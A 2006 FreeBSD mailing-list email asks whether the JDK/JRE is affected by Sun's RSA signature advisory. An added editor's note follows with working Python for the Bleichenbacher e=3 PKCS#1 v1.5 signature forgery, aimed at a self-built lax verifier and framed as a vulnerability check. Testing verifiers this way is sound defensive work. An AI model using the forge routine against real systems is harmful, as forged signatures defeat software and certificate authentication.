From owner-freebsd-java@FreeBSD.ORG Fri Oct 13 19:26:22 2006
Date: Fri, 13 Oct 2006 23:18:53 +0400
From: "Andrew Pantyukhin"
Sender: infofarmer@gmail.com
To: "Greg Lewis", java@FreeBSD.org
Cc: "Simon L. Nielsen", secteam@freebsd.org
Subject: Re: JDK/JRE RSA vulnerability
In-Reply-To: <20061004181113.GB1008@zaphod.nitro.dk>
References: <20061004181113.GB1008@zaphod.nitro.dk>
List-Id: Porting Java to FreeBSD

On 10/4/06, Simon L. Nielsen wrote:
> On 2006.10.04 20:41:34 +0400, Andrew Pantyukhin wrote:
> > Please review the following patch to vuln.xml:
> >
> > http://people.freebsd.org/~sat/diffs/jdk1509.diff
>
> Are you sure that the JDK/JRE for FreeBSD is actually vulnerable? On
> some OSes which don't support cryptographic operations by default
> (e.g. Windows) crypto libs are bundled with the program, but OS
> supplied libs are used on the OSes which have them. I don't know if
> this is the case for JDK/JRE but it should probably be checked first.
> Could you poke the java people (e.g. glewis AFAIR) to check?
>
> As a side note, the Secunia advisory doesn't contain anything which
> isn't on Sun's page, so it's much better to use the info directly from Sun.

Could you please take a look and tell us if we're affected by one or
more of these advisories:

http://sunsolve.sun.com/search/document.do?assetkey=1-26-102648-1
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-5201
http://secunia.com/advisories/22204/

I'm almost sure Linux versions are vulnerable, but as for native
versions (both certified and not), it's unclear.

Thank you!
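Editor's note: the thread asks whether a given JDK/JRE build is affected, and the practical way to answer that for an RSA signature-forgery advisory is to feed the verifier a deliberately malformed PKCS#1 v1.5 encoding and see whether it accepts it. The example below is added here and is not code from the thread, from Sun, or from the FreeBSD port; it assumes (the editor's reading, not something the thread states) that the Sun alert concerns the padding-check weakness Bleichenbacher described in 2006, where a verifier with a low public exponent (e = 3) accepts an encoded message that has extra bytes after the DigestInfo. It implements a toy RSA key generator, a genuine signer, a lax verifier showing the affected pattern, a strict verifier, and the e = 3 forgery; the message, seed and key size are constructed sample inputs.

```python
"""Added example: RSA PKCS#1 v1.5 forgery (e = 3) against a lax verifier.

Stdlib only. The key generator is for the demonstration, not for production use.
"""
import hashlib
import hmac
import random

# DER DigestInfo prefix for SHA-256 (RFC 8017, section 9.2, note 1).
SHA256_DIGESTINFO = bytes.fromhex("3031300d060960864801650304020105000420")
PUBLIC_EXPONENT = 3


def _is_probable_prime(n: int, rng: random.Random, rounds: int = 32) -> bool:
    """Miller-Rabin; adequate for an example key."""
    if n < 4:
        return n in (2, 3)
    if n % 2 == 0:
        return False
    d, r = n - 1, 0
    while d % 2 == 0:
        d //= 2
        r += 1
    for _ in range(rounds):
        x = pow(rng.randrange(2, n - 2), d, n)
        if x in (1, n - 1):
            continue
        for _ in range(r - 1):
            x = pow(x, 2, n)
            if x == n - 1:
                break
        else:
            return False
    return True


def generate_key(bits: int = 2048, seed: int = 2006):
    """Deterministic toy RSA key with e = 3; p, q = 2 (mod 3) so 3 is invertible mod phi."""
    rng = random.Random(seed)  # fixed seed: constructed, reproducible example key
    half = bits // 2

    def prime() -> int:
        while True:
            cand = rng.getrandbits(half) | (1 << (half - 1)) | 1  # exact bit length, odd
            if cand % 3 == 2 and _is_probable_prime(cand, rng):
                return cand

    p, q = prime(), prime()
    n = p * q
    d = pow(PUBLIC_EXPONENT, -1, (p - 1) * (q - 1))
    return n, PUBLIC_EXPONENT, d


def _icbrt(x: int) -> int:
    """Floor of the integer cube root, by binary search."""
    lo, hi = 0, 1 << (x.bit_length() // 3 + 1)
    while lo < hi:
        mid = (lo + hi + 1) // 2
        if mid ** 3 <= x:
            lo = mid
        else:
            hi = mid - 1
    return lo


def _digest_info(msg: bytes) -> bytes:
    return SHA256_DIGESTINFO + hashlib.sha256(msg).digest()


def _decode(sig: bytes, n: int, e: int) -> bytes:
    """Recover the encoded message EM = sig^e mod n as a k-byte string."""
    k = (n.bit_length() + 7) // 8
    return pow(int.from_bytes(sig, "big"), e, n).to_bytes(k, "big")


def sign(msg: bytes, n: int, d: int) -> bytes:
    """Genuine PKCS#1 v1.5 signature: EM = 00 01 FF..FF 00 || DigestInfo."""
    k = (n.bit_length() + 7) // 8
    t = _digest_info(msg)
    em = b"\x00\x01" + b"\xff" * (k - 3 - len(t)) + b"\x00" + t
    return pow(int.from_bytes(em, "big"), d, n).to_bytes(k, "big")


def verify_lax(msg: bytes, sig: bytes, n: int, e: int) -> bool:
    """The affected pattern: walk the padding, then never look past the DigestInfo."""
    em = _decode(sig, n, e)
    if em[:2] != b"\x00\x01":
        return False
    i = 2
    while i < len(em) and em[i] == 0xFF:
        i += 1
    if i >= len(em) or em[i] != 0x00:
        return False
    t = _digest_info(msg)
    return em[i + 1:i + 1 + len(t)] == t  # trailing bytes are ignored: the bug


def verify_strict(msg: bytes, sig: bytes, n: int, e: int) -> bool:
    """Correct check: rebuild the single valid EM and compare the whole block."""
    em = _decode(sig, n, e)
    t = _digest_info(msg)
    expected = b"\x00\x01" + b"\xff" * (len(em) - 3 - len(t)) + b"\x00" + t
    return hmac.compare_digest(em, expected)


def forge(msg: bytes, n: int, e: int) -> bytes:
    """No private key needed for e = 3: choose the trailing garbage so that EM is a
    perfect cube; then cbrt(EM)^3 < n, so cbrt(EM)^3 mod n reproduces EM exactly."""
    assert e == 3, "this forgery needs a low public exponent"
    k = (n.bit_length() + 7) // 8
    prefix = b"\x00\x01" + b"\xff" * 8 + b"\x00" + _digest_info(msg)
    garbage_bits = 8 * (k - len(prefix))
    top = int.from_bytes(prefix, "big")
    s = _icbrt((top << garbage_bits) | ((1 << garbage_bits) - 1))
    assert (s ** 3) >> garbage_bits == top  # cube lands inside the garbage window
    return s.to_bytes(k, "big")


def demo() -> dict:
    """Run both verifiers on a genuine and a forged signature."""
    n, e, d = generate_key()
    msg = b"constructed sample message"
    genuine, forged = sign(msg, n, d), forge(msg, n, e)
    return {
        "genuine_lax": verify_lax(msg, genuine, n, e),
        "genuine_strict": verify_strict(msg, genuine, n, e),
        "forged_lax": verify_lax(msg, forged, n, e),
        "forged_strict": verify_strict(msg, forged, n, e),
    }


if __name__ == "__main__":
    print(demo())
```

The lax verifier accepts the forgery while the strict one rejects it; the genuine signature passes both. Applied to the question in the thread: an RSA implementation is affected if it behaves like `verify_lax`, regardless of which operating system supplies it, so the thing to check in a port is the verifier's behaviour on a malformed encoding, not only which library is linked.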